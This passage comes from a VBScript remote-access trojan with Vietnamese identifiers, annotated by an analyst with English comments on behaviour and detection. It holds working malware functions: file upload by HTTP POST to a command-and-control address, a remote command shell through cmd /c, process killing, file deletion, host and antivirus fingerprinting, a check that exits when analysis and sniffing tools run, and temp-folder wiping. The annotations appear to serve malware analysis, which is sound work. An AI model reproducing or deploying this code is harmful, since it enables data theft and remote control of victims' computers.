  309. function LAY_FILE_VE_NHA_QUANLYFILE_HAM(URL_CHUA_FILE)
  ' The local MANG_CUA_TUI shadows the script-level HTTP object of the same name.
  310. dim MANG_CUA_TUI,ADO_LAY_FILE_VE_NHA,BO_DEM_BUF_LAY_FILE_VE_NHA
  311. set ADO_LAY_FILE_VE_NHA = createobject("adodb.stream")
  ' Load the whole file into memory through a binary (type 1) stream.
  312. with ADO_LAY_FILE_VE_NHA
  313. .type = 1
  314. .open
  315. .loadfromfile URL_CHUA_FILE
  316. BO_DEM_BUF_LAY_FILE_VE_NHA = .read
  317. .close
  318. end with
  319. set ADO_LAY_FILE_VE_NHA = nothing
  320. set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
  ' Unlike THANK_GOD_YOU_ARE_HERE, this request sets no extra header.
  321. MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-recving" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
  322. MANG_CUA_TUI.send BO_DEM_BUF_LAY_FILE_VE_NHA
  323. end function
  ' Handler for "enum-driver": lists ready drives.
  ' Returns one "<path>|<drivetype>" record per ready drive, each followed by the "<|>" separator.
  324. function LAY_THONG_TIN_CAC_O_DIA_HAM()
  325. for each CAC_HDD_USB_DVD_CD in OBJ_HE_THONG_TAPTIN.drives
  ' Drives that are not ready (for example an empty optical drive) are skipped.
  326. if CAC_HDD_USB_DVD_CD.isready = true then
  327. LAY_THONG_TIN_CAC_O_DIA_HAM = LAY_THONG_TIN_CAC_O_DIA_HAM & CAC_HDD_USB_DVD_CD.path & "|" & CAC_HDD_USB_DVD_CD.drivetype & BO_CHIA_KY_TU
  328. end if
  329. next
  330. end function
  ' Handler for "enum-faf": directory listing of one folder (not recursive).
  '   CAC_THU_MUC_GET_INF - folder path to list
  ' Returns the folder path, then "<name>||d|<attributes>" per subfolder and
  ' "<name>|<size>|f|<attributes>" per file, every record followed by the "<|>" separator.
  331. function LAY_THONG_TIN_THU_MUC_HAM(CAC_THU_MUC_GET_INF)
  332. LAY_THONG_TIN_THU_MUC_HAM = CAC_THU_MUC_GET_INF & BO_CHIA_KY_TU
  ' Subfolders first; the size field is left empty for directories.
  333. for each THU_MUC_DA_CO_TRONG_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).subfolders
  334. LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & THU_MUC_DA_CO_TRONG_MACHINE.name & "||d|" & THU_MUC_DA_CO_TRONG_MACHINE.attributes & BO_CHIA_KY_TU
  335. next
  ' Then files, with size in the second field.
  336. for each TTIN_DA_CO_IN_MACHINE in OBJ_HE_THONG_TAPTIN.getfolder(CAC_THU_MUC_GET_INF).files
  337. LAY_THONG_TIN_THU_MUC_HAM = LAY_THONG_TIN_THU_MUC_HAM & TTIN_DA_CO_IN_MACHINE.name & "|" & TTIN_DA_CO_IN_MACHINE.size  & "|f|" & TTIN_DA_CO_IN_MACHINE.attributes & BO_CHIA_KY_TU
  338. next
  339. end function
  ' Handler for "enum-process": process listing through WMI.
  ' Returns "<name>|<pid>|<executable path>" per process, each record followed by the "<|>" separator.
  340. function LAY_TTIN_CAC_TIEN_TRINH_HAM()
  341. on error resume next
  342. set OBJ_WMI_SER_PROC = getobject("winmgmts:\\.\root\cimv2")
  ' Flags 48 = return immediately (16) + forward-only enumerator (32).
  343. set CAC_DT_THEO_COT_PROC = OBJ_WMI_SER_PROC.execquery("select * from win32_process",,48)
  344. dim DT_PROC
  345. for each DT_PROC in CAC_DT_THEO_COT_PROC
  346. LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.name & "|"
  347. LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.processid & "|"
  348. LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.executablepath & BO_CHIA_KY_TU
  349. next
  350. end function
  ' Handler for "exit-process": force-kills a process tree by PID.
  '   MA_SO_TIEN_TRINH - PID taken from the server command and concatenated into the command line unchanged
  ' Detection: wscript.exe spawning "taskkill /F /T /PID <n>".
  351. sub TAT_TIEN_TRINH_SUB(MA_SO_TIEN_TRINH)
  352. on error resume next
  ' Window style 7 = minimized; the final true makes the script wait for taskkill to finish.
  353. OBJ_WS_SHELL.run "taskkill /F /T /PID " & MA_SO_TIEN_TRINH,7,true
  354. end sub
  ' Handler for "delete": removes a file or a folder at a server-supplied path.
  '   DUONG_DAN_FILE_OR_THU_MUC - path to delete
  355. sub XOA_TAP_TIN_VA_THU_MUC_SUB(DUONG_DAN_FILE_OR_THU_MUC)
  ' Both calls are attempted with force = true; whichever does not match the path type fails and is ignored.
  356. on error resume next
  357. OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_FILE_OR_THU_MUC,true
  358. OBJ_HE_THONG_TAPTIN.deletefolder DUONG_DAN_FILE_OR_THU_MUC,true
  359. end sub
  ' Handler for "cmd-shell": runs a server-supplied command line through the command interpreter.
  '   LENH_THUC_THI - command text, appended unchanged after "%comspec% /c "
  ' Returns stdout when it has data, otherwise stderr when it has data, otherwise "".
  ' Detection: wscript.exe as the parent of cmd.exe /c <command>.
  360. function DIEU_KHIEN_CMD_HAM(LENH_THUC_THI)
  361. dim MANG_CUA_TUI,OBJ_WS_SHELL_EXECU,DOC_DATA_SHELL_OUT
  362. set OBJ_WS_SHELL_EXECU = OBJ_WS_SHELL.exec("%comspec% /c " & LENH_THUC_THI)
  ' Only one of the two streams is returned; stderr is read only when stdout is already at end of stream.
  363. if not OBJ_WS_SHELL_EXECU.stdout.atendofstream then
  364. DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stdout.readall
  365. elseif not OBJ_WS_SHELL_EXECU.stderr.atendofstream then
  366. DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stderr.readall
  367. else
  368. DOC_DATA_SHELL_OUT = ""
  369. end if
  370. DIEU_KHIEN_CMD_HAM = DOC_DATA_SHELL_OUT
  371. end function
  ' Builds the host fingerprint sent in the request header of every THANK_GOD_YOU_ARE_HERE call.
  ' Field order, "<|>"-separated:
  '   <volume serial> | MeoIT <|> <computer name> <|> <user name> <|> <OS caption> <|> plus <|> <AV names> <|> <origin marker>
  ' The literal "plus" and the " | MeoIT" suffix are fixed strings in this sample and usable as network indicators.
  372. function HAM_TAP_HOP_CAC_INFOR
  373. on error resume next
  ' Build the string only when inf is empty; otherwise return the stored value.
  374. if inf = "" then
  375. inf = HAM_LAY_TEN_VIC_THEO_MA_HW & BO_CHIA_KY_TU
  376. inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%computername%") & BO_CHIA_KY_TU
  377. inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%username%") & BO_CHIA_KY_TU
  378. set RT_INF = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  379. set HDH = RT_INF.execquery("select * from win32_operatingsystem")
  ' Take the caption of the first Win32_OperatingSystem instance only.
  380. for each TEN_HDH in HDH
  381. inf = inf & TEN_HDH.caption & BO_CHIA_KY_TU
  382. exit for
  383. next
  384. inf = inf & "plus" & BO_CHIA_KY_TU
  385. inf = inf & HAM_LAY_TEN_TRINH_AV & BO_CHIA_KY_TU
  ' Origin marker set in BAT_DAU_CHAY_HAM ("true - <date>" / "false - <date>").
  386. inf = inf & CO_HAY_KHONG_TU_USB
  387. HAM_TAP_HOP_CAC_INFOR = inf
  388. else
  389. HAM_TAP_HOP_CAC_INFOR = inf
  390. end if
  391. end function
  ' Derives the host identifier used in the beacon: the first non-empty logical-disk
  ' volume serial number with the fixed suffix " | MeoIT".
  ' Side effect: creates the staging folder %TEMP%\Luu_Tam_Nhe when it is missing (host artifact).
  392. function HAM_LAY_TEN_VIC_THEO_MA_HW
  393. on error resume next
  394. if not OBJ_HE_THONG_TAPTIN.FolderExists(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe") then OBJ_HE_THONG_TAPTIN.CreateFolder(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe")
  395. set RT_TEN_MACHINE = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  396. set CAC_HDD = RT_TEN_MACHINE.execquery ("select * from win32_logicaldisk")
  ' Stop at the first disk that reports a serial number.
  397. for each O_DIA_CUNG_SSD in CAC_HDD
  398. if O_DIA_CUNG_SSD.volumeserialnumber <> "" then
  399. HAM_LAY_TEN_VIC_THEO_MA_HW = O_DIA_CUNG_SSD.volumeserialnumber & " | MeoIT"
  400. exit for
  401. end if
  402. next
  403. end function
  ' Security-product discovery: returns the display names of registered antivirus products,
  ' each followed by " .", or "None AV" when the query yields nothing.
  ' Detection: a script host querying root\securitycenter or root\securitycenter2 for AntiVirusProduct.
  404. function HAM_LAY_TEN_TRINH_AV
  405. on error resume next
  406. HAM_LAY_TEN_TRINH_AV = ""
  407. set OBJ_WMI_HDH = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  408. set CAC_DT_THEO_COT_HDH = OBJ_WMI_HDH.execquery("select * from win32_operatingsystem",,48)
  ' Split the OS version string on dots.
  409. for each DT_AV in CAC_DT_THEO_COT_HDH
  410. PHIEN_BAN_AV = split(DT_AV.version,".")
  411. next
  412. PHIEN_BAN_AV = split(CAC_DT_THEO_COT_HDH.version,".")
  ' Rebuild a numeric value from the version parts and evaluate it.
  ' NOTE(review): errors are suppressed in this function, so the computed value may differ from the real OS version - verify in a sandbox trace.
  413. PHIEN_BAN_HDH = PHIEN_BAN_AV (0) & "."
  414. for x = 1 to ubound(PHIEN_BAN_AV)
  415. PHIEN_BAN_HDH = PHIEN_BAN_HDH & PHIEN_BAN_AV(i)
  416. next
  417. PHIEN_BAN_HDH = eval(PHIEN_BAN_HDH)
  ' Choose the WMI namespace by version: securitycenter2 when the value is above 6, otherwise securitycenter.
  418. if PHIEN_BAN_HDH > 6 then TRUNG_TAM_SECU = "securitycenter2" else TRUNG_TAM_SECU = "securitycenter"
  419. set DT_TRUNG_TAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNG_TAM_SECU)
  420. set COT_AV = DT_TRUNG_TAM_SECU.execquery("select * from antivirusproduct","wql",0)
  421. for each TEN_AV in COT_AV
  422. HAM_LAY_TEN_TRINH_AV = HAM_LAY_TEN_TRINH_AV & TEN_AV.displayname & " ."
  423. next
  424. if HAM_LAY_TEN_TRINH_AV = "" then HAM_LAY_TEN_TRINH_AV = "None AV"
  425. end function
  ' Anti-analysis check, run at the top of every main-loop pass.
  ' Issues one Win32_Process query per hard-coded process name (task managers, packet sniffers,
  ' fake-DNS/fake-network tools, rootkit scanners, sandbox components) and exits the script
  ' when any query returns exactly one instance (each test is Count = 1).
  ' Analyst note: the script stops beaconing while one of these tools is running, so dynamic analysis
  ' with them open will show no network traffic. The Run-key and Startup persistence is not removed here,
  ' so the script starts again at the next logon.
  ' Detection: a script host issuing this burst of Win32_Process name queries on every polling interval.
  426. sub CHONG_CAC_PROC
  427. on error resume next
  428. CHUOI_PC = "."
  429. set DT_WIN_MGR = GetObject("winmgmts:" _
  430. & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
  ' One query object per watched process name follows.
  431. set TTR_MOT = DT_WIN_MGR.ExecQuery _
  432. ("SELECT * FROM Win32_Process WHERE Name = " & _
  433. "'taskmgr.exe'")
  434. set TTR_HAI = DT_WIN_MGR.ExecQuery _
  435. ("SELECT * FROM Win32_Process WHERE Name = " & _
  436. "'processhacker.exe'")
  437. set TTR_BA = DT_WIN_MGR.ExecQuery _
  438. ("SELECT * FROM Win32_Process WHERE Name = " & _
  439. "'procexp.exe'")
  440. set TTR_BON = DT_WIN_MGR.ExecQuery _
  441. ("SELECT * FROM Win32_Process WHERE Name = " & _
  442. "'apatedns.exe'")
  443. set TTR_NAM = DT_WIN_MGR.ExecQuery _
  444. ("SELECT * FROM Win32_Process WHERE Name = " & _
  445. "'fakenet.exe'")
  446. set TTR_SAU = DT_WIN_MGR.ExecQuery _
  447. ("SELECT * FROM Win32_Process WHERE Name = " & _
  448. "'fab.exe'")
  449. set TTR_BAY = DT_WIN_MGR.ExecQuery _
  450. ("SELECT * FROM Win32_Process WHERE Name = " & _
  451. "'cports.exe'")
  452. set TTR_TAM = DT_WIN_MGR.ExecQuery _
  453. ("SELECT * FROM Win32_Process WHERE Name = " & _
  454. "'smsniff.exe'")
  455. set TTR_CHIN_1 = DT_WIN_MGR.ExecQuery _
  456. ("SELECT * FROM Win32_Process WHERE Name = " & _
  457. "'pchunter32.exe'")
  458. set TTR_CHIN_2 = DT_WIN_MGR.ExecQuery _
  459. ("SELECT * FROM Win32_Process WHERE Name = " & _
  460. "'pchunter64.exe'")
  461. set TTR_MUOI = DT_WIN_MGR.ExecQuery _
  462. ("SELECT * FROM Win32_Process WHERE Name = " & _
  463. "'roguekiller.exe'")
  464. set TTR_MUOI_MOT = DT_WIN_MGR.ExecQuery _
  465. ("SELECT * FROM Win32_Process WHERE Name = " & _
  466. "'spybhoremover.exe'")
  467. set TTR_MUOI_HAI = DT_WIN_MGR.ExecQuery _
  468. ("SELECT * FROM Win32_Process WHERE Name = " & _
  469. "'defenderdaemon.exe'")
  470. set TTR_MUOI_BA = DT_WIN_MGR.ExecQuery _
  471. ("SELECT * FROM Win32_Process WHERE Name = " & _
  472. "'HijackThis.exe'")
  473. set TTR_MUOI_BON = DT_WIN_MGR.ExecQuery _
  474. ("SELECT * FROM Win32_Process WHERE Name = " & _
  475. "'Wireshark.exe'")
  476. set TTR_MUOI_LAM = DT_WIN_MGR.ExecQuery _
  477. ("SELECT * FROM Win32_Process WHERE Name = " & _
  478. "'Vbs Lookup.exe'")
  479. set TTR_MUOI_SAU = DT_WIN_MGR.ExecQuery _
  480. ("SELECT * FROM Win32_Process WHERE Name = " & _
  481. "'Vbs Killer.exe'")
  482. set TTR_MUOI_BAY = DT_WIN_MGR.ExecQuery _
  483. ("SELECT * FROM Win32_Process WHERE Name = " & _
  484. "'Vbs Deleter.exe'")
  485. set TTR_MUOI_TAM = DT_WIN_MGR.ExecQuery _
  486. ("SELECT * FROM Win32_Process WHERE Name = " & _
  487. "'sandboxierpcss.exe'")
  488. set TTR_MUOI_CHIN = DT_WIN_MGR.ExecQuery _
  489. ("SELECT * FROM Win32_Process WHERE Name = " & _
  490. "'netagent.exe'")
  491. set TTR_HAI_MUOI = DT_WIN_MGR.ExecQuery _
  492. ("SELECT * FROM Win32_Process WHERE Name = " & _
  493. "'tiger-Firewall.exe'")
  494. set TTR_HAI_MUOI_MOT = DT_WIN_MGR.ExecQuery _
  495. ("SELECT * FROM Win32_Process WHERE Name = " & _
  496. "'TcpView.exe'")
  497. set TTR_HAI_MUOI_HAI = DT_WIN_MGR.ExecQuery _
  498. ("SELECT * FROM Win32_Process WHERE Name = " & _
  499. "'ProcessLasso.exe'")
  500. set TTR_HAI_MUOI_BA = DT_WIN_MGR.ExecQuery _
  501. ("SELECT * FROM Win32_Process WHERE Name = " & _
  502. "'Active Ports.exe'")
  503. set TTR_HAI_MUOI_BON = DT_WIN_MGR.ExecQuery _
  504. ("SELECT * FROM Win32_Process WHERE Name = " & _
  505. "'SystemExplorer.exe'")
  ' The results are tested in three groups; any single match ends the script.
  506. if TTR_MOT.Count = 1 or TTR_HAI.Count = 1 or TTR_BA.Count = 1 or TTR_BON.Count = 1 or TTR_NAM.Count = 1 or TTR_SAU.Count = 1 or TTR_BAY.Count = 1 or TTR_TAM.Count = 1 then
  507. wscript.quit
  508. end if
  509. if TTR_CHIN_1.Count = 1 or TTR_CHIN_2.Count = 1 or TTR_MUOI.Count = 1 or TTR_MUOI_MOT.Count = 1 or TTR_MUOI_HAI.Count = 1 or TTR_MUOI_BA.Count = 1 or TTR_MUOI_BON.Count = 1 then
  510. wscript.quit
  511. end if
  512. if TTR_MUOI_LAM.Count = 1 or TTR_MUOI_SAU.Count = 1 or TTR_MUOI_BAY.Count = 1 or TTR_MUOI_TAM.Count = 1 or TTR_MUOI_CHIN.Count = 1 or TTR_HAI_MUOI.Count = 1 or TTR_HAI_MUOI_MOT.Count = 1 or TTR_HAI_MUOI_HAI.Count = 1 or TTR_HAI_MUOI_BA.Count = 1 or TTR_HAI_MUOI_BON.Count = 1 then
  513. wscript.quit
  514. end if
  515. end sub
  ' Age-based cleanup used by the install routine: deletes files and subfolders of the given
  ' directory whose creation date is more than 8 days old.
  '   STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X - directory to clean (TEMP and IE cache paths at the call sites)
  ' Forensic note: because the install routine runs on every main-loop pass, aged temp artifacts
  ' in these directories are removed continuously on an infected host.
  516. sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
  517. On Error Resume Next
  518. dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
  519. dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
  520. dim OBJ_CAC_FILE_TEMP
  521. dim i
  522. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
  523. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
  ' Force-delete files created more than 8 days ago.
  524. For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
  525. If OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_FILE_TEMP.delete(True) End If
  526. Next
  ' The subfolder pass is repeated 11 times (i = 0 to 10) with the same age test.
  527. For i = 0 To 10
  528. For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
  529. If OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_DIR_TEMP.Delete(True) End If
  530. Next
  531. Next
  532. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
  533. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
  534. set OBJ_CAC_DIR_TEMP = Nothing
  535. set OBJ_CAC_FILE_TEMP = Nothing
  536. end sub
  ' Unconditional cleanup used by the uninstall routine: force-deletes every file and subfolder
  ' of the given directory, with no age filter.
  '   STR_DUONG_DAN_TEMP_IN_SUB - directory to empty (TEMP and IE cache paths at the call sites)
  ' Forensic note: after an "uninstall" command, staged payloads under %TEMP% are expected to be gone.
  537. sub XOA_TEMP_SUB_LUC_GO(STR_DUONG_DAN_TEMP_IN_SUB)
  538. On Error Resume Next
  539. dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
  540. dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
  541. dim OBJ_CAC_FILE_TEMP
  542. dim i
  543. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
  544. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB)
  ' Files that are locked or protected fail to delete and are skipped (errors are suppressed).
  545. For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
  546. OBJ_CAC_FILE_TEMP.delete(True)
  547. Next
  ' The subfolder pass is repeated 11 times (i = 0 to 10).
  548. For i = 0 To 10
  549. For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
  550. OBJ_CAC_DIR_TEMP.Delete(True)
  551. Next
  552. Next
  553. set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
  554. set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
  555. set OBJ_CAC_DIR_TEMP = Nothing
  556. set OBJ_CAC_FILE_TEMP = Nothing
  557. end sub"